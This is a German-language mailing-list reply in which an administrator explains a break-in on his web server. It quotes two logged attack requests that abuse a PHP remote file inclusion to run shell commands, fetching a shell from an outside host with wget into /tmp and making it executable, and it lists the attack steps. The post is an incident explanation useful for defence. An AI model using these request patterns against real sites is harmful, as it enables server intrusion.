Re: daemonOptik Backdoor funcionando 18383

Matthias Borrack <[email protected]>
Newsgroups gmane.linux.redhat.general.german
Message-ID <[email protected]>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

support schrieb:
| Hallo
|
| Habe den zusammenhang nicht ganz mitbekommen, du verwendest eine php seite
| die dann ein gif laded und ein commando ausfuehrt ??
|
| auf dem client ausfuehrt ??
|
| !! daemonOptik Backdoor funcionando 18383 !!
|
| wuerde mich noch interresieren.
|
Moin moin,

nein, die index.php auf der betroffenen Webseite hat die URL's included

"GET
/index.php?page=http://xxx.xxxxx.com/cse.gif?&cmd=cd%20/tmp;wget%20http://xxx.xxxxx.com.br/informatica/smartboy/index.html
HTTP/1.1"

"GET
/index.php?page=http://a1ts.250free.com/cse.gif?&cmd=cd%20/tmp;chmod%20777%20index.html.2
~ HTTP/1.1"

Entscheidend ist die cse.gif, die enthält den Exploit (u. a. auch einen
KernelExploit).

Der Ablauf ist folgender
aufruf der index.php a la
http://zieldomain/index.php?http://ExploitQuelle/cse.gif&Commando
In diesem Fall also
- - wechsel in das /tmp Verzeichnis (durch Tests bestätigt: das einzige
Verzeichnis auf dem ex anwendbar war
- - per wget abruf der Shell
- - wechsel nach /tmp und chmod auf die Shell
- - wechsel nach /tmp und starten der Shell

Glück um Unglück: Der KernelExploit funktionierte nicht, sonst wäre es
eine Shell mit root-Rechten gewesen, es wurde als "unauthorisierter
Port" erkannt und der Socket abgelehnt und der Netfilter hat den Port eh
net freigegeben.

Feststeht, es ist kein Exploit gegen PHP insgesamt, sondern wohl nur
gegen schlechtes PHP-Coding.

Bis dann,
Matthias

_______________________________________________
redhat-list-de mailing list
[email protected]
https://www.redhat.com/mailman/listinfo/redhat-list-de





-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFAsauUWTMfCbz57ScRAgvZAJ9WSZ4ejvVWjs1hvtPfc/gkQliQyACfX0Jd
yd9UyD6toNFpHGDtbBdmsZ4=
=jIi9
-----END PGP SIGNATURE-----
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.